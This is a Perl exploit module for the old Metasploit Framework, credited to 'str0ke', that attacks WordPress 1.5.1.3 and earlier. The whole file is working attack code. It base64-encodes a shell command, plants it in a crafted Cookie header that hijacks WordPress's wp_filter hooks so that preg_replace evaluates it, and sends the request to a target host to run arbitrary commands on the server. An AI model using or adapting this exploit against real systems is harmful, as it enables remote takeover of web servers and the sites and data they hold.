Remote Code Execution eXploit -WordPress

1. ##
2. # Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
3. # Name: php_wordpress.pm
4. # - This is an exploit module for the Metasploit Framework, please see
5. # http://metasploit.com/projects/Framework for more information.
6. #
7. ##
8.  
9. package Msf::Exploit::php_wordpress;
10. use base "Msf::Exploit";
11. use strict;
12. use Pex::Text;
13. use bytes;
14.  
15. my $advanced = { };
16.  
17. my $info = {
18. 'Name' => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit',
19. 'Version' => '$Revision: 1.0 $',
20. 'Authors' => [ 'str0ke' ],
21. 'Arch' => [ ],
22. 'OS' => [ ],
23. 'Priv' => 0,
24. 'UserOpts' =>
25. {
26. 'RHOST' => [1, 'ADDR', 'The target address'],
27. 'RPORT' => [1, 'PORT', 'The target port', 80],
28. 'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
29. 'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],
30. 'SSL' => [0, 'BOOL', 'Use SSL'],
31. },
32.  
33. 'Description' => Pex::Text::Freeform(qq{
34. This module exploits a code execution exploit in wordpress blog <= 1.5.1.3.
35. }),
36.  
37. 'Refs' =>
38. [
39. ['MIL', '1142'],
40. ],
41.  
42. 'Payload' =>
43. {
44. 'Space' => 512,
45. 'Keys' => ['cmd', 'cmd_bash'],
46. },
47.  
48. 'Keys' => ['wordpress'],
49. };
50.  
51. sub new {
52. my $class = shift;
53. my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
54. return($self);
55. }
56.  
57. sub Exploit {
58. my $self = shift;
59. my $target_host = $self->GetVar('RHOST');
60. my $target_port = $self->GetVar('RPORT');
61. my $vhost = $self->GetVar('VHOST') || $target_host;
62. my $path = $self->GetVar('RPATH');
63. my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
64.  
65. my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");");
66. $encoded =~ s/\n//gm;
67.  
68. my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded));
69.  
70. $byte.=".chr(32)";
71.  
72. my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x');
73.  
74. $str =~ s/\n//gm;
75.  
76. my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;".
77. "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;".
78. "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str".
79. ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;".
80. "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;".
81. "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;";
82.  
83. my $req =
84. "GET $path HTTP/1.0\r\n".
85. "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n".
86. "Host: $vhost:$target_port\r\n".
87. "Pragma: no-cache\r\n".
88. "Accept: */*\r\n".
89. "Cookie: $data\r\n".
90. "\r\n";
91.  
92. my $s = Msf::Socket::Tcp->new(
93. 'PeerAddr' => $target_host,
94. 'PeerPort' => $target_port,
95. 'LocalPort' => $self->GetVar('CPORT'),
96. 'SSL' => $self->GetVar('SSL'),
97.  
98. );
99.  
100. if ($s->IsError){
101. $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
102. return;
103. }
104.  
105. $self->PrintLine("[*] Sending the malicious WordPress Get request...");
106.  
107. $s->Send($req);
108.  
109. my $results = $s->Recv(-1, 20);
110. $s->Close();
111. $self->PrintLine($results);
112.  
113. return;
114. }
115.  
116. 1;